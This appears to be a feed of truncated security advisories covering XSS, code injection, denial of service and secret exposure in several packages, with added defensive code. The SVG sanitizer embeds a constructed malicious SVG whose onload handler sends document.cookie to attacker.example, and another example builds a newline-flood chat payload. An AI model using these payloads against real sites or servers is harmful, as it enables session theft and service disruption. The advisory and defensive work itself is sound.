The ctx project hosted on PyPI was taken over via a user account compromise and replaced with a malicious version whose runtime code collected the contents of os.environ.items() whenever a Ctx object was instantiated. The captured environment varia…
[fof/upload] Possible cross-site scripting attack via unsanitized SVG files in FoF Upload
Impact
If FoF Upload is configured to allow uploading SVG files (image/svg+xml), navigating directly to an uploaded SVG file's URI can execute arbitrary attacker-controlled JavaScript.
This JavaScript code could include the execution of HTTP web …
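As an added illustration (not FoF Upload's code), the check below shows what "active content" in an uploaded SVG looks like and how an upload handler can reject it or, failing that, serve it so it cannot run. The two SVG documents are constructed samples; the element denylist and the header policy are this example's assumptions, and a production sanitizer should prefer an allowlist and parse untrusted XML with defusedxml rather than plain ElementTree.

```python
import xml.etree.ElementTree as ET

# Elements that carry or load executable content. A denylist is enough to illustrate
# the point; a real sanitizer should keep only an allowlist of safe elements/attributes.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "set", "animate"}

# Constructed sample of what an attacker uploads when image/svg+xml is allowed.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="1" height="1"
     onload="fetch('https://attacker.example/?c=' + document.cookie)">
  <script>alert(document.domain)</script>
  <a xlink:href="javascript:alert(1)"><text y="10">click</text></a>
</svg>"""

# Constructed benign upload for comparison.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""


def _local(name):
    # ElementTree spells namespaced names as "{uri}local"; keep only "local".
    return name.rsplit("}", 1)[-1]


def find_active_content(svg_bytes):
    """Return a list of findings describing script-capable content in the SVG."""
    findings = []
    root = ET.fromstring(svg_bytes)          # raises ET.ParseError on malformed input
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"element <{tag}>")
        for attr, value in elem.attrib.items():
            aname = _local(attr).lower()
            v = value.strip().lower()
            if aname.startswith("on"):
                # Event handler attributes (onload, onclick, ...) run script when rendered.
                findings.append(f"event handler {aname} on <{tag}>")
            elif aname == "href" and (v.startswith("javascript:") or v.startswith("data:")):
                findings.append(f"{v.split(':', 1)[0]}: URL in href on <{tag}>")
    return findings


def is_safe_svg(svg_bytes):
    """Accept an upload only if it parses and carries no active content."""
    try:
        return not find_active_content(svg_bytes)
    except ET.ParseError:
        return False


def download_headers(content_type):
    """Headers for serving user uploads: never let an SVG execute when opened directly."""
    headers = {"Content-Type": content_type, "X-Content-Type-Options": "nosniff"}
    if content_type == "image/svg+xml":
        # Force a download instead of rendering, and deny script even if it is rendered.
        headers["Content-Disposition"] = "attachment"
        headers["Content-Security-Policy"] = "script-src 'none'; sandbox"
    return headers
```

Rejecting the upload is the primary control; the headers are defence in depth for installations that must keep SVG enabled, since a browser navigating straight to the file URI is exactly the case the advisory describes.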
[org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki] XSS in wiki manager join wiki page
Impact
We found a possible XSS vector in the WikiManager.JoinWiki wiki page related to the “requestJoin” field.
Patches
The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, 13.10.3.
Workarounds
The easiest workaround is to edit the wiki page …
[org.xwiki.platform:xwiki-platform-flamingo-theme-ui] XSS in the Flamingo theme manager
Impact
We found a possible XSS vector in the FlamingoThemesCode.WebHomeSheet wiki page related to the “newThemeName” form field.
Patches
The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, 13.10.3.
Workarounds
The easiest workaround is to edi…
[com.vaadin:vaadin] Possible information disclosure inside TreeGrid component with default data provider
Description
The default configuration of a TreeGrid component uses Object::toString as a key on the client-side and server communication in Vaadin 14.8.5 through 14.8.9, 22.0.6 through 22.0.14, 23.0.0.beta2 through 23.0.8 and 23.1.0.alpha1 through 23.1…
[mautic/core] Cross-site Scripting vulnerability in Mautic’s tracking pixel functionality
Impact
Mautic allows you to track open rates by using tracking pixels.
The tracking information is stored together with extra metadata of the tracking request.
The output isn’t sufficiently filtered when showing the metadata of the tracking informatio…
[pocketmine/pocketmine-mp] Denial-of-service vulnerability processing large chat messages containing many newlines
Impact
PocketMine-MP caps maximum chat message length at 512 Unicode characters, or about 2048 bytes. No more than 2 chat messages may be sent per tick. However, due to legacy reasons, incoming chat message blobs are split by \n, and each part is treat…
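To make the amplification concrete, here is an added model of the behaviour the advisory describes; it is not PocketMine-MP's code. It assumes the flawed ordering is "rate-limit and length-check the incoming blob, then split it on \n", that empty parts are dropped, and that every surviving part costs the server a full chat broadcast. The hardened variant charges each part against the per-tick budget instead of each blob.

```python
MAX_CHAT_CHARS = 512        # per the advisory: a chat message is capped at 512 code points
MAX_MESSAGES_PER_TICK = 2   # per the advisory: at most two chat messages per tick


def legacy_split(blob):
    # Legacy behaviour from the advisory: one incoming blob is split on "\n" and each
    # piece is handled as a message of its own. Assumption: empty pieces are dropped.
    return [part for part in blob.split("\n") if part != ""]


def handle_tick_vulnerable(blobs):
    """Model of the flawed ordering: limit and length-check the blob, then split it."""
    delivered = []
    for blob in blobs[:MAX_MESSAGES_PER_TICK]:   # cap applies to blobs, not to parts
        if len(blob) > MAX_CHAT_CHARS:
            continue                               # too long: rejected
        delivered.extend(legacy_split(blob))      # every part costs a broadcast
    return delivered


def handle_tick_hardened(blobs):
    """Charge every part produced by the split against the per-tick budget."""
    budget = MAX_MESSAGES_PER_TICK
    delivered = []
    for blob in blobs:
        if len(blob) > MAX_CHAT_CHARS:
            continue
        for part in legacy_split(blob):
            if budget == 0:
                return delivered                   # budget exhausted: drop the rest
            budget -= 1
            delivered.append(part)
    return delivered


def amplification(blob):
    """How many server-side messages one client packet turns into."""
    return len(legacy_split(blob))


if __name__ == "__main__":
    attack = "a\n" * 256                           # exactly 512 characters: passes the cap
    print("parts from one blob:", amplification(attack))
    print("vulnerable per tick:", len(handle_tick_vulnerable([attack, attack])))
    print("hardened per tick:  ", len(handle_tick_hardened([attack, attack])))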
[smarty/smarty] PHP Code Injection by malicious block or filename
Impact
Template authors could inject PHP code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should update as soon as possible.
Patches
Please upgrade to the most recent version of Smarty v3 or v4.
Workaroun…
[neos/neos] XSS in various backend modules due to (un)escaping in JS notification module
The notification module that displays flash messages unescapes HTML coming from the server, resulting in XSS vulnerabilities through various names and labels of entities (e.g. a workspace title or media title). This however means you must be a logged-in user wit…
[github.com/coreos/ignition] Ignition config accessible to unprivileged software on VMware
Impact
Unprivileged software in VMware VMs, including software running in unprivileged containers, can retrieve an Ignition config stored in a hypervisor guestinfo variable or OVF environment. If the Ignition config contains secrets, this can result i…
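The following added script (not part of Ignition) is the check a practitioner would run inside a VMware guest: read the guestinfo variable as an ordinary user, decode it, and list the config fields that commonly carry secrets. It assumes open-vm-tools provides `vmtoolsd` (or `vmware-rpctool`) and that the key names and the encodings accepted for them (plain, base64, gzip+base64) match Ignition's VMware provider documentation. The sample config is constructed; its hash and token are placeholders.

```python
import base64
import gzip
import json
import os
import shutil
import subprocess

# Keys Ignition reads on VMware (assumed from Ignition's VMware provider documentation).
DATA_KEY = "guestinfo.ignition.config.data"
ENCODING_KEY = "guestinfo.ignition.config.data.encoding"


def decode_guestinfo(data, encoding):
    """Undo the encodings Ignition accepts for the data key: "", base64, gzip+base64."""
    enc = (encoding or "").strip()
    if enc == "":
        return data
    if enc == "base64":
        return base64.b64decode(data).decode()
    if enc == "gzip+base64":
        return gzip.decompress(base64.b64decode(data)).decode()
    raise ValueError(f"unknown encoding {enc!r}")


def load_config(data, encoding):
    return json.loads(decode_guestinfo(data, encoding))


def encode_guestinfo(config):
    """Produce the gzip+base64 form an operator would set; used for the sample below."""
    payload = gzip.compress(json.dumps(config).encode())
    return base64.b64encode(payload).decode(), "gzip+base64"


def find_secrets(config):
    """Locate fields in an Ignition config that commonly hold secrets."""
    hits = []
    for i, user in enumerate(config.get("passwd", {}).get("users", [])):
        if user.get("passwordHash"):
            hits.append(f"passwd.users[{i}].passwordHash")
    for i, f in enumerate(config.get("storage", {}).get("files", [])):
        source = f.get("contents", {}).get("source", "")
        if source.startswith("data:"):     # inline file body shipped in the config
            hits.append(f"storage.files[{i}].contents.source ({f.get('path')})")
    return hits


def read_guestinfo(key):
    """Ask the hypervisor for a guestinfo value via open-vm-tools, as the current user.

    Assumption: vmtoolsd or vmware-rpctool is installed. Neither requires root,
    which is why an unprivileged process can reach the config at all.
    """
    exe = shutil.which("vmtoolsd")
    if exe:
        cmd = [exe, "--cmd", f"info-get {key}"]
    else:
        exe = shutil.which("vmware-rpctool")
        if not exe:
            return None
        cmd = [exe, f"info-get {key}"]
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return proc.stdout.strip() if proc.returncode == 0 else None


# Constructed sample config; the hash and token are placeholders, not real credentials.
SAMPLE_CONFIG = {
    "ignition": {"version": "3.3.0"},
    "passwd": {"users": [{"name": "core", "passwordHash": "$6$constructed$placeholder"}]},
    "storage": {"files": [{"path": "/etc/app/token",
                           "contents": {"source": "data:,constructed-api-token"}}]},
}


if __name__ == "__main__":
    data = read_guestinfo(DATA_KEY)
    if data is None:
        print("no guestinfo config readable (not VMware, tools missing, or already cleared)")
    else:
        cfg = load_config(data, read_guestinfo(ENCODING_KEY) or "")
        print("ignition config readable by uid", os.getuid())
        for hit in find_secrets(cfg):
            print("  secret-bearing field:", hit)
```

If the probe prints anything as an unprivileged user after first boot, the config is still exposed; the remedy is to keep secrets out of the Ignition config (fetch them at runtime with a node identity instead) and to confirm the guestinfo variable is cleared once provisioning finishes.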